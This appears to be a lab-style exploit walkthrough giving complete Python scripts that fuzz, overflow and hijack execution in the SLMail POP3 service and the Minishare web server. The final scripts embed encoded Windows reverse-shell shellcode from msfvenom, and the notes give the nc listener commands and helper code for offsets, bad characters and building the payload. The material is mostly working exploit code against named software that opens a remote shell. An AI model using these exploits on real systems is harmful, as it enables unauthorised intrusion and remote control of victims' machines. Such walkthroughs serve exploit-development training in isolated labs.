Buffer Overflow - SL-Mail
Before each stage: stop the service and close Immunity Debugger, restart the service, reopen Immunity Debugger, attach it to the service (File > Attach) and press F9 so the process is running rather than paused. Every script below is Python 2 (print statement, str buffers), as in the original notes.
Step 1 - Check you can connect to the service
import socket
try:
    print "\nSending Evil Buffer..."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.101',110))
    s.send('USER test' + '\r\n')
    s.send('PASS test' + '\r\n')
    s.close()
except:
    print "Could not connect to POP3!"
Step 2 - Fuzz the application to cause a crash
import socket
# buffers of 1, 100, 300, 500, ... bytes: the first entry is a single "A", then 200-byte steps
buffer = ["A"]
counter = 100
while len(buffer) <= 30:
    buffer.append("A"*counter)
    counter = counter + 200
for string in buffer:
    print "Fuzzing PASS with %s bytes" % len(string)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect(('192.168.56.101',110))
    s.send('USER test' + '\r\n')
    s.send('PASS ' + string + '\r\n')
    s.close()
Fuzzing PASS with 1 bytes
Fuzzing PASS with 100 bytes
Fuzzing PASS with 300 bytes
Fuzzing PASS with 500 bytes
Fuzzing PASS with 700 bytes
Fuzzing PASS with 900 bytes
Fuzzing PASS with 1100 bytes
Fuzzing PASS with 1300 bytes
Fuzzing PASS with 1500 bytes
Fuzzing PASS with 1700 bytes
Fuzzing PASS with 1900 bytes
Fuzzing PASS with 2100 bytes
Fuzzing PASS with 2300 bytes
Fuzzing PASS with 2500 bytes
Fuzzing PASS with 2700 bytes
Fuzzing PASS with 2900 bytes
The crash happens somewhere around the 2900 mark. Note that send() returns as soon as the data is buffered, so the 2700-byte buffer may be the one that actually killed the service and the script only fails when the next connect() is refused; check Immunity Debugger for the access violation rather than trusting the last line printed.
Step 3 - Ensure a plain buffer of the expected length causes the crash.
import socket
buffer = "A"*2700   # just past the length the fuzzer crashed at
try:
    print "\nSending Evil Buffer"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.101',110))
    s.send('USER username' +'\r\n')
    s.send('PASS ' + buffer + '\r\n')
    s.close()
except:
    print "Could not connect to POP3!"
This should crash the server with EIP overwritten by 41414141 (four "A" bytes).
Step 4 - Locate the EIP overwrite offset.
Create a 2700-byte cyclic pattern and paste it into the script as the buffer:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
import socket
buffer = 'Aa0Aa1Aa2A-patterngoeshere-a3Aa4Aa5Aa6A'   # paste the full 2700-byte pattern_create output here
try:
    print "\nSending Evil Buffer"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.101',110))
    s.send('USER username' +'\r\n')
    s.send('PASS ' + buffer + '\r\n')
    s.close()
except:
    print "Could not connect to POP3!"
Note the EIP value in Immunity Debugger, here 39694438, and look it up in the pattern (the value is a little-endian dword, so it corresponds to the bytes "8Di9"):
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
[*] Exact match at offset 2606
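Added example, not code from the original notes: a Python 3 reimplementation of what pattern_create.rb and pattern_offset.rb do, so the offset can be recomputed without Metasploit and the little-endian step is explicit. It is checked against the page's own values (EIP 39694438 in a 2700-byte pattern gives offset 2606). Function names are mine; the same pattern_offset gives the Minishare offset of 1787 once that target's EIP value is read from the debugger.

```python
import string
import struct

# The three alphabets pattern_create.rb cycles through: one byte from each, in
# order, so every 3-byte triple is unique for the first 26*26*10*3 = 20280 bytes.
_SETS = (string.ascii_uppercase, string.ascii_lowercase, string.digits)


def pattern_create(length):
    """Return `length` bytes of cyclic pattern (same output as pattern_create.rb -l length)."""
    out = bytearray()
    for u in _SETS[0]:
        for l in _SETS[1]:
            for d in _SETS[2]:
                out += (u + l + d).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])   # beyond the unique range we cut rather than wrap


def eip_to_needle(query):
    """Turn what Immunity shows in EIP into the 4 bytes that sat in memory.

    Accepts an 8-hex-digit string such as '39694438' (or an int) and returns it
    little-endian, because x86 stores the low byte first: 0x39694438 is the
    bytes b'8Di9' in the pattern.  A 4-character fragment is used as-is."""
    if isinstance(query, int):
        return struct.pack("<I", query)
    query = query.strip()
    if query.lower().startswith("0x"):
        query = query[2:]
    if len(query) == 8 and all(c in string.hexdigits for c in query):
        return struct.pack("<I", int(query, 16))
    return query.encode("ascii")


def pattern_offset(query, length):
    """Offset of the EIP value inside a pattern of `length` bytes, or -1 if absent
    (same answer as pattern_offset.rb -q query -l length)."""
    return pattern_create(length).find(eip_to_needle(query))


if __name__ == "__main__":
    print("EIP 39694438 -> bytes %r -> offset %d"
          % (eip_to_needle("39694438"), pattern_offset("39694438", 2700)))
```

If pattern_offset returns -1, either the pattern sent was shorter than the offset, or EIP was not overwritten by the pattern at all (for example a pointer to it), which is worth knowing before trusting a crash.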
Step 5 - Overwrite EIP with 4 x B (\x42)
import socket
buffer = "A"*2606 + "B"*4 + "C"*90   # 2606 bytes to reach EIP, 4 bytes into EIP, then filler that should land at ESP
try:
    print "\nSending Evil Buffer"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.101',110))
    s.send('USER username' +'\r\n')
    s.send('PASS ' + buffer + '\r\n')
    s.close()
except:
    print "Could not connect to POP3!"
Look for 42424242 in the EIP register; the offset is confirmed when exactly the four B's land there.
Step 6 - Check the buffer is long enough to hold the reverse shellcode.
import socket
buffer = "A"*2606 + "B"*4 + "C"*(3500-2606-4)   # 890 bytes of C after EIP
try:
    print "\nSending Evil Buffer"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.101',110))
    s.send('USER username' +'\r\n')
    s.send('PASS ' + buffer + '\r\n')
    s.close()
except:
    print "Could not connect to POP3!"
This should still crash with 42424242 in EIP and leave a large amount of space for the payload.
Right-click the ESP register, choose "Follow in Dump", and check that a long run of memory is overwritten with 43 (the C characters); that run is where the shellcode will go.
Step 7 - Check for bad characters
import socket
# every byte value 0x00-0xff; \x00 terminates C strings, so expect it (and usually \x0a, \x0d) to be flagged
badchars = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
"\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"
"\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"
"\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf"
"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"
"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer = "A"*2606 + "B"*4 + badchars
try:
    print "\nSending Evil Buffer"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.101',110))
    s.send('USER username' +'\r\n')
    s.send('PASS ' + buffer + '\r\n')
    s.close()
except:
    print "Could not connect to POP3!"
Follow ESP in the dump and compare it byte by byte with the sequence you sent. Find the first place where the dump is truncated, or where a byte is missing or altered: that byte is a bad character. For example, if the dump reads 01 02 03 04 05 -missing- 07, then \x06 is a bad character.
Only the first divergence in each run is reliable, because everything after a dropped byte is shifted. Remove that character from badchars, restart the debugger and the service, rerun the script, and repeat until the whole sequence survives.
Keep a note of every bad character you remove. When the final three bytes in the dump read FD FE FF, the string was not truncated and all remaining bad characters have been identified.
In Immunity Debugger type !mona modules and choose a DLL whose protection columns (Rebase, SafeSEH, ASLR, NXCompat, OS Dll) read FALSE FALSE FALSE FALSE TRUE, i.e. a module with no rebasing, no SafeSEH, no ASLR and no NX flag, so the address of an instruction inside it is stable. Then search it for a JMP ESP (opcode bytes FF E4):
!mona find -s "\xff\xe4" -m slmfc.dll
If the module contains no JMP ESP, move on to another one. Alternatively, upload findjmp.exe to the host and run:
findjmp.exe slmfc.dll esp
Choose a JMP ESP address from the list, make sure none of its four bytes is a bad character, and write it into the buffer little-endian (the bytes \xe3\x41\x4b\x5f used below are the address 0x5F4B41E3).
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
Check that the msfvenom output reports the payload was encoded with x86/shikata_ga_nai; if encoding failed or was skipped, the raw payload will still contain the bad characters.
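Added example, not code from the original notes, covering both the Step 7 comparison and the check on the msfvenom output just above. first_bad_char diffs what was sent against the bytes read back from the ESP dump and reports whether the sequence was truncated, a byte was dropped (the page's 01 02 03 04 05 -missing- 07 case) or rewritten; find_all_bad_chars repeats that loop until the dump ends in FD FE FF; contains_bad_chars is the check to run over the encoded shellcode or a candidate return address. fake_slmail_dump is a constructed stand-in for the real target that reproduces the page's result of \x00, \x0a and \x0d being bad; all names are mine.

```python
def badchar_sequence(exclude=()):
    """All 256 byte values in order, minus the ones already identified as bad."""
    exclude = set(exclude)
    return bytes(b for b in range(256) if b not in exclude)


def first_bad_char(sent, dumped):
    """Compare the sequence sent with the bytes read back from the dump at ESP.

    Returns (bad_byte, reason) for the first divergence, or (None, 'ok') when
    the dump holds the whole sequence unchanged.  Only the first hit is
    trusted per run: once a byte is dropped or mangled everything after it is
    shifted or rewritten, which is why the target is restarted and the script
    re-run after removing each character."""
    for i, b in enumerate(sent):
        if i >= len(dumped):
            return b, "truncated"        # copy stopped here, e.g. a string terminator
        if dumped[i] != b:
            if i + 1 < len(sent) and dumped[i] == sent[i + 1]:
                return b, "dropped"      # the '01 02 03 04 05 -missing- 07' case
            return b, "mangled"          # byte rewritten, e.g. CR/LF translation
    return None, "ok"


def find_all_bad_chars(read_dump, start_exclude=()):
    """Drive the loop: send the remaining bytes, diff, remove the culprit, repeat.

    `read_dump` stands in for the manual 'follow ESP in dump' step and must
    return the bytes the target actually kept for the sequence it was given."""
    bad = list(start_exclude)
    while True:
        sent = badchar_sequence(bad)
        culprit, reason = first_bad_char(sent, read_dump(sent))
        if culprit is None:
            return bad                   # dump ends in FD FE FF: nothing left to remove
        bad.append(culprit)


def contains_bad_chars(blob, bad):
    """Sorted list of bytes in `blob` (msfvenom output, return address) that are bad.
    An empty result means the encoder really did strip them."""
    return sorted(set(blob) & set(bad))


def fake_slmail_dump(sent):
    """Constructed model of the target, not a capture: stops copying at NUL and
    drops CR and LF, the behaviour behind the -b "\\x00\\x0a\\x0d" used on this page."""
    kept = bytearray()
    for b in sent:
        if b == 0x00:
            break
        if b in (0x0a, 0x0d):
            continue
        kept.append(b)
    return bytes(kept)


if __name__ == "__main__":
    print("bad chars found:", ["\\x%02x" % b for b in find_all_bad_chars(fake_slmail_dump)])
    print("page example:", first_bad_char(b"\x01\x02\x03\x04\x05\x06\x07",
                                          b"\x01\x02\x03\x04\x05\x07"))
```

Against a real target, read_dump is you copying the bytes out of Immunity's dump window; the point of keeping it as a function is that the comparison logic, and the rule of trusting only the first divergence, stay the same for SLMail, Minishare or anything else.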
import socket
# msfvenom output from above (351 bytes, x86/shikata_ga_nai, no \x00 \x0a \x0d)
shellcode = (
"\xd9\xc8\xbe\xf1\x66\xed\xf4\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x52\x31\x73\x17\x03\x73\x17\x83\x32\x62\x0f\x01\x48\x83\x4d"
"\xea\xb0\x54\x32\x62\x55\x65\x72\x10\x1e\xd6\x42\x52\x72\xdb"
"\x29\x36\x66\x68\x5f\x9f\x89\xd9\xea\xf9\xa4\xda\x47\x39\xa7"
"\x58\x9a\x6e\x07\x60\x55\x63\x46\xa5\x88\x8e\x1a\x7e\xc6\x3d"
"\x8a\x0b\x92\xfd\x21\x47\x32\x86\xd6\x10\x35\xa7\x49\x2a\x6c"
"\x67\x68\xff\x04\x2e\x72\x1c\x20\xf8\x09\xd6\xde\xfb\xdb\x26"
"\x1e\x57\x22\x87\xed\xa9\x63\x20\x0e\xdc\x9d\x52\xb3\xe7\x5a"
"\x28\x6f\x6d\x78\x8a\xe4\xd5\xa4\x2a\x28\x83\x2f\x20\x85\xc7"
"\x77\x25\x18\x0b\x0c\x51\x91\xaa\xc2\xd3\xe1\x88\xc6\xb8\xb2"
"\xb1\x5f\x65\x14\xcd\xbf\xc6\xc9\x6b\xb4\xeb\x1e\x06\x97\x63"
"\xd2\x2b\x27\x74\x7c\x3b\x54\x46\x23\x97\xf2\xea\xac\x31\x05"
"\x0c\x87\x86\x99\xf3\x28\xf7\xb0\x37\x7c\xa7\xaa\x9e\xfd\x2c"
"\x2a\x1e\x28\xe2\x7a\xb0\x83\x43\x2a\x70\x74\x2c\x20\x7f\xab"
"\x4c\x4b\x55\xc4\xe7\xb6\x3e\x2b\x5f\x80\xbf\xc3\xa2\xf0\xbe"
"\xa8\x2a\x16\xaa\xde\x7a\x81\x43\x46\x27\x59\xf5\x87\xfd\x24"
"\x35\x03\xf2\xd9\xf8\xe4\x7f\xc9\x6d\x05\xca\xb3\x38\x1a\xe0"
"\xdb\xa7\x89\x6f\x1b\xa1\xb1\x27\x4c\xe6\x04\x3e\x18\x1a\x3e"
"\xe8\x3e\xe7\xa6\xd3\xfa\x3c\x1b\xdd\x03\xb0\x27\xf9\x13\x0c"
"\xa7\x45\x47\xc0\xfe\x13\x31\xa6\xa8\xd5\xeb\x70\x06\xbc\x7b"
"\x04\x64\x7f\xfd\x09\xa1\x09\xe1\xb8\x1c\x4c\x1e\x74\xc9\x58"
"\x67\x68\x69\xa6\xb2\x28\x99\xed\x9e\x19\x32\xa8\x4b\x18\x5f"
"\x4b\xa6\x5f\x66\xc8\x42\x20\x9d\xd0\x27\x25\xd9\x56\xd4\x57"
"\x72\x33\xda\xc4\x73\x16")
# 2606 bytes of filler, JMP ESP in slmfc.dll (0x5F4B41E3, little-endian), a short NOP sled, then the payload
buffer = "A"*2606 + "\xe3\x41\x4b\x5f" + "\x90"*8 + shellcode
try:
    print "\nSending Evil Buffer"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.101',110))
    s.send('USER username' +'\r\n')
    s.send('PASS ' + buffer + '\r\n')
    s.close()
except:
    print "Could not connect to POP3!"
Start the listener on the attacking machine before running the script (nc -nlvp 443), and run the final test with the service started normally rather than under the debugger.
Buffer Overflow - Minishare
Step 1 - Crash The Service
import socket
target_address="192.168.56.101"
target_port=80   # assumed: Minishare's default HTTP port; the original notes do not record it
buffer ="GET " + "A" * 2000   # assumed: an oversized GET path; the notes do not record the crash length, anything past the ~1866 bytes used later will do
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
print "Sent! Check the server has crashed"
Step 2 - Find the EIP offset with a cyclic pattern
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l   (the length used was not recorded in the notes)
import socket
target_address="192.168.56.101"
target_port=80   # assumed, as in Step 1
buffer ="GET "
# pattern_create output as recorded; it is cut off after "Co", so paste the complete pattern here
buffer +=("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1"
"Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4"
"Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8A"
"g9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4"
"Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am"
"0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1"
"Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4"
"Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8A"
"s9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3"
"Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5A"
"x6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9"
"Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2"
"Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5"
"Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9B"
"h0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5B"
"j6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1"
"Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo"
"3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq"
"6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0B"
"t1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv"
"5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7"
"Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0C"
"a1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc"
"3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5"
"Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg"
"9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj"
"4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9"
"Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co")
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
print "Sent! Check the server has crashed"
Read the EIP value from Immunity Debugger and feed it to pattern_offset.rb -q; the offset used from here on is 1787.
Step 3 - Overwrite EIP with B's
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l   (length not recorded in the notes)
# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q   (EIP value not recorded in the notes; it gave offset 1787)
import socket
target_address="192.168.56.101"
target_port=80   # assumed, as in Step 1
buffer ="GET "
buffer +="A" * 1787 + "B" * 4 + "C" * (1866-1787-4)   # 1787 bytes to EIP, 4 bytes into EIP, 75 bytes of C after it
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
print "Sent! Check the server has crashed"
EIP should now read 42424242.
Step 4 - Increase Buffer Size to make sure we have room for shellcode
# Increase the buffer size to check the shellcode will have enough space after EIP
import socket
target_address="192.168.56.101"
target_port=80   # assumed, as in Step 1
buffer ="GET "
buffer +="A" * 1787 + "B" * 4 + "C" * 409   # 409 bytes after EIP: room for the 351-byte encoded shell plus a NOP sled
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
print "Sent! Check the server has crashed"
Confirm EIP is still 42424242 and that the dump at ESP shows the full run of 43 bytes.
Step 5 - Find return Address and remove all bad characters
#!mona find -s "\xff\xe4" -m user32.dll = 0x7e429353
That JMP ESP in user32.dll is written little-endian in Step 6 as "\x53\x93\x42\x7e"; check none of those four bytes is a bad character.
See Step 7 of the SLMail walkthrough for finding the bad characters.
Step 6 - Generate New Reverse Shell
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 -b   (the bad-character list after -b was not recorded in the notes)
import socket
# msfvenom output (351 bytes, encoded)
shellcode = (
"\xdb\xd8\xbf\x4c\x49\x8a\x73\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x83\xea\xfc\x31\x7a\x13\x03\x36\x5a\x68\x86\x3a\xb4\xee"
"\x69\xc2\x45\x8f\xe0\x27\x74\x8f\x97\x2c\x27\x3f\xd3\x60\xc4"
"\xb4\xb1\x90\x5f\xb8\x1d\x97\xe8\x77\x78\x96\xe9\x24\xb8\xb9"
"\x69\x37\xed\x19\x53\xf8\xe0\x58\x94\xe5\x09\x08\x4d\x61\xbf"
"\xbc\xfa\x3f\x7c\x37\xb0\xae\x04\xa4\x01\xd0\x25\x7b\x19\x8b"
"\xe5\x7a\xce\xa7\xaf\x64\x13\x8d\x66\x1f\xe7\x79\x79\xc9\x39"
"\x81\xd6\x34\xf6\x70\x26\x71\x31\x6b\x5d\x8b\x41\x16\x66\x48"
"\x3b\xcc\xe3\x4a\x9b\x87\x54\xb6\x1d\x4b\x02\x3d\x11\x20\x40"
"\x19\x36\xb7\x85\x12\x42\x3c\x28\xf4\xc2\x06\x0f\xd0\x8f\xdd"
"\x2e\x41\x6a\xb3\x4f\x91\xd5\x6c\xea\xda\xf8\x79\x87\x81\x94"
"\x4e\xaa\x39\x65\xd9\xbd\x4a\x57\x46\x16\xc4\xdb\x0f\xb0\x13"
"\x1b\x3a\x04\x8b\xe2\xc5\x75\x82\x20\x91\x25\xbc\x81\x9a\xad"
"\x3c\x2d\x4f\x61\x6c\x81\x20\xc2\xdc\x61\x91\xaa\x36\x6e\xce"
"\xcb\x39\xa4\x67\x61\xc0\x2f\x48\xde\xf2\xae\x20\x1d\x02\xb0"
"\x0b\xa8\xe4\xd8\x7b\xfd\xbf\x74\xe5\xa4\x4b\xe4\xea\x72\x36"
"\x26\x60\x71\xc7\xe9\x81\xfc\xdb\x9e\x61\x4b\x81\x09\x7d\x61"
"\xad\xd6\xec\xee\x2d\x90\x0c\xb9\x7a\xf5\xe3\xb0\xee\xeb\x5a"
"\x6b\x0c\xf6\x3b\x54\x94\x2d\xf8\x5b\x15\xa3\x44\x78\x05\x7d"
"\x44\xc4\x71\xd1\x13\x92\x2f\x97\xcd\x54\x99\x41\xa1\x3e\x4d"
"\x17\x89\x80\x0b\x18\xc4\x76\xf3\xa9\xb1\xce\x0c\x05\x56\xc7"
"\x75\x7b\xc6\x28\xac\x3f\xf6\x62\xec\x16\x9f\x2a\x65\x2b\xc2"
"\xcc\x50\x68\xfb\x4e\x50\x11\xf8\x4f\x11\x14\x44\xc8\xca\x64"
"\xd5\xbd\xec\xdb\xd6\x97")
target_address="192.168.56.101"
target_port=80   # assumed, as in Step 1
buffer ="GET "
# 1787 bytes of filler, JMP ESP in user32.dll (0x7E429353, little-endian), a 20-byte NOP sled, then the payload
buffer +="A" * 1787 + "\x53\x93\x42\x7e" + "\x90" * 20 + shellcode
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
print "Sent! Did you get a shell?"
Start the listener first (nc -nlvp 443) and run the final attempt against the service started normally, not under the debugger.
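Added example, not code from the original notes, serving the final SLMail script (Step 7 above) and this Minishare Step 6 script: the same buffer layout, offset filler | return address | NOP sled | shellcode, built by one Python 3 function that packs the address little-endian and refuses to build if the address or the payload contains a bad character or if the sled plus payload exceeds the space the long C-filled buffer proved was available. The two request builders use the page's numbers for each target; PLACEHOLDER_SHELLCODE is a constructed 351-byte stand-in (INT3s) for the msfvenom output, the Minishare bad-character list is assumed to be the SLMail one because the page's own list for it is cut off, and all names are mine.

```python
import struct

BAD_CHARS = (0x00, 0x0a, 0x0d)   # SLMail's list from the page; assumed for Minishare too


def p32(addr):
    """Pack a 32-bit address little-endian, the byte order it must have in the
    buffer so that 0x5F4B41E3 / 0x7E429353 land in EIP."""
    return struct.pack("<I", addr)


def build_overflow(offset, ret_addr, nop_count, shellcode, bad_chars, space_after_eip):
    """Return offset filler | return address | NOP sled | shellcode, or raise.

    The checks are the ones the walkthrough does by hand: no bad character in
    the return address or payload (they would be dropped or mangled in transit),
    and the sled plus payload must fit in the bytes verified after EIP."""
    ret = p32(ret_addr)
    bad = set(bad_chars)
    for name, blob in (("return address", ret), ("shellcode", shellcode)):
        hits = sorted(set(blob) & bad)
        if hits:
            raise ValueError("%s contains bad chars: %s"
                             % (name, " ".join("\\x%02x" % h for h in hits)))
    tail = b"\x90" * nop_count + shellcode
    if len(tail) > space_after_eip:
        raise ValueError("need %d bytes after EIP but only %d were verified"
                         % (len(tail), space_after_eip))
    return b"A" * offset + ret + tail


def slmail_request(shellcode):
    """POP3 PASS command: 2606 bytes to EIP, JMP ESP 0x5F4B41E3 in slmfc.dll,
    8-byte sled, 3500-2606-4 = 890 bytes verified after EIP in Step 6."""
    return b"PASS " + build_overflow(2606, 0x5F4B41E3, 8, shellcode, BAD_CHARS, 3500 - 2606 - 4) + b"\r\n"


def minishare_request(shellcode):
    """HTTP GET: 1787 bytes to EIP, JMP ESP 0x7E429353 in user32.dll,
    20-byte sled, 409 bytes verified after EIP in Step 4."""
    return b"GET " + build_overflow(1787, 0x7E429353, 20, shellcode, BAD_CHARS, 409) + b" HTTP/1.1\r\n\r\n"


# Constructed stand-in for the 351-byte msfvenom output on the page: INT3s, so a
# debugger attached to the target would break as soon as execution reached it.
PLACEHOLDER_SHELLCODE = b"\xcc" * 351


def send_raw(host, port, data, preamble=()):
    """Deliver a built request; `preamble` lines (e.g. USER for POP3) go first."""
    import socket
    s = socket.create_connection((host, port), timeout=5)
    for line in preamble:
        s.sendall(line)
    s.sendall(data)
    s.close()


if __name__ == "__main__":
    req = slmail_request(PLACEHOLDER_SHELLCODE)
    print("SLMail request: %d bytes, EIP bytes: %s" % (len(req), req[5 + 2606:5 + 2610].hex()))
    req = minishare_request(PLACEHOLDER_SHELLCODE)
    print("Minishare request: %d bytes, EIP bytes: %s" % (len(req), req[4 + 1787:4 + 1791].hex()))
    # send_raw("192.168.56.101", 110, slmail_request(PLACEHOLDER_SHELLCODE), preamble=[b"USER username\r\n"])
```

Swap PLACEHOLDER_SHELLCODE for the real msfvenom bytes and the builder will reject them if the encoder left a bad character in, which is the check the page asks for after generating the shell.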